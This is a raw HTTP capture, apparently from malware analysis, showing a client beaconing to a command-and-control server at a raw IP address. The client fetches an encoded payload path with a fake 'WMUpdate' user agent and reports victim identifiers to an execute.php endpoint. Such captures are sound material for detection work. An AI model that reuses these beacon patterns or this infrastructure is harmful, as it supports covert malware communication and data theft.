HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 23:10:13 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.0
Last-Modified: Mon, 28 Feb 2011 02:49:18 GMT
ETag: "5900002-54-b9db2780"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain

032183095029110096022122191076035
063053228095212238236088179107172098218083254

GET /setup/nvvsvcs/nvvsvcs.svc HTTP/1.1
User-Agent: WMUpdate
Host: 221.143.48.236
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 23:10:14 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.0
X-Powered-By: PHP/5.2.0
Content-Length: 0
Connection: close
Content-Type: text/html

GET /logdata/execute.php?m_origin=ADDNISUE&usr_id=AD&usr_gubun=E&serialno=MDkxMTA4MDcyNzA0MTgzODE2&Pid=nvvsvcs HTTP/1.1
Content-Type: text/html
Host: 221.143.48.236
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Internet Explorer)

